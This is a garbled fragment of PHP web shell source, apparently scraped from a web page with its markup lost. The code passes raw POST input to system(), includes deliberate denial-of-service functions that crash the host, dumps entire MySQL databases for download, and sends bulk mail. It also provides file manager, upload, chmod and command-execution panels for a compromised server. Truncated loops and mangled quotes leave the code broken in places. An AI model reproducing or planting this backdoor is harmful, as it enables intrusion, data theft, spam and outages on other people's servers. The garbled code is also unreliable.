if ($_POST[‘ad1syc’] && $_POST[‘ad2syc’]){
if (system(‘ls -s ‘.$_POST[‘ad1syc’].” “.$_POST[‘ad2syc’])){
alert(“Symlink Worked !”);
}else{alert(“Symlink Not Worked !”);}
}
if ($_GET[‘do’]==”d0slocal”){
echo $head.’

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure ‘.$end;exit;}
if ($_GET[‘dosthisserver’]==”1″){
function dosserver(){
$junk=str_repeat(“99999999999999999999999999999999999999999999999999”,99999);
for($i=0;$i<2;){ $buff=bcpow($junk, '3', 2); $buff=null; } } dosserver(); } if ($_GET['dosthisserver']=="2"){ function cx(){cx();} cx(); } if ($_GET['do']=="convert"){ $hash=null; if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){ $hash=md5($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){ $hash=sha1($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){ $hash=crc32($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){ $hash=base64_encode($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){ $hash=base64_decode($_GET['stringtoh']); } echo $head.'

Convert


‘.$end;exit;}
if ($_GET[‘do’]==”dump”){
echo $head.’

‘;
echo ‘

Backup Database

DB Type:
Server:
Username:
Password:
Data Base Name:

‘.$end;exit;}
if ($_POST[‘username’] && $_POST[‘dbname’] && $_POST[‘method’]){
$date = date(“Y-m-d”);
$dbserver = $_POST[‘server’];
$dbuser = $_POST[‘username’];
$dbpass = $_POST[‘password’];
$dbname = $_POST[‘dbname’];
$file = “Dump-$dbname-$date”;
$method = $_POST[‘method’];
if ($method==’sql’){
$file=”Dump-$dbname-$date.sql”;
$fp=fopen($file,”w”);
}else{
$file=”Dump-$dbname-$date.sql.gz”;
$fp = gzopen($file,”w”);
}
function write($data) {
global $fp;
if ($_POST[‘method’]==’sql’){
fwrite($fp,$data);
}else{
gzwrite($fp, $data);
}}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query (“SHOW TABLES”);
while ($i = mysql_fetch_array($tables)) {
$i = $i[‘Tables_in_’.$dbname];
$create = mysql_fetch_array(mysql_query (“SHOW CREATE TABLE “.$i));
write($create[‘Create Table’].”;nn”);
$sql = mysql_query (“SELECT * FROM “.$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = “‘”.mysql_escape_string($k).”‘”;
}
write(“INSERT INTO $i VALUES(“.implode(“,”, $row).”);n”);
}
}
}
if ($method==’sql’){
fclose ($fp);
}else{
gzclose($fp);}
header(“Content-Disposition: attachment; filename=” . $file);
header(“Content-Type: application/download”);
header(“Content-Length: ” . filesize($file));
flush();

$fp = fopen($file, “r”);
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);
}

if ($_GET[‘do’]==”mail”){
echo $head.’

Address :

Subject :

Number For Send :

‘.$end;exit;}
if ($_POST[‘admail’] && $_POST[‘submail’] ){
for($mi=0;$miChmod
To

“.$end;exit;

}
/* if($_GET[‘do’]==”edit”){
if($_GET[‘filename’]==”dir”){
if(is_readable($_GET[‘address’])){
chdir($_GET[‘address’]);}else{alert(“Permission Denied !”);}

}} */
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],””,$araddresss);
for($countback=0;$countback=1){
$rr=str_replace($basep,””,getcwd());
$rr=str_replace(“\”,”/”,$rr);
$diropen=’‘.$parsef.’‘;
}else{
$diropen=’‘.$parsef.’‘;
}
return $diropen;
}
if ($_GET[‘address’]){$ifget=$_GET[‘address’];}if($_POST[‘address’]){$ifget=$_POST[‘address’];}
if($cwd==”){$cwd=getcwd();}$nowaddress=’‘;
$ad=getcwd();
$hand=opendir(“$ad”);
$coi=0;
$coi2=0;

while (false !== ($fileee = readdir($hand))) {

if ($fileee != “.” && $fileee != “..”) {
if (filetype($fileee)==”dir”){
if ($coi %2){
$colort='”#e7e3de”‘;
}else{
$colort='”#e4e1de”‘;

}
$coi++;
$fil=$fil.’

‘.$fileee.’

‘.date(“y/m/d”, filectime($fileee)).’ ‘.substr(sprintf(‘%o’, fileperms($cwd.$slash.”$fileee”)), -3).’ DL Ren Del


;}
else{

if ($coi2 %2){
$colort='”#e7e3de”‘;
}else{
$colort='”#e4e1de”‘;
}

$coi2++;
$file=$file.’

‘.openf($fileee).’

‘.sizee(filesize($fileee)).’ ‘.date(“y/m/d”, filectime($fileee)).’ ‘.substr(sprintf(‘%o’, fileperms($cwd.$slash.”$fileee”)), -3).’ Edit DL Ren Del


;}
}
}
echo $head.’

Now Directory : ‘.getcwd().”
“.printdrive().’
Back

‘.$fil.$file.’

‘.$end;
?>


‘.$formg.’Command Execute :

‘.$formg.’Change Dir :


‘.$formg.’Create Dir :

‘.$formg.’Create File :

‘.$formg.’Upload :
‘.$nowaddress.’


‘.$formg.’Copy File :
To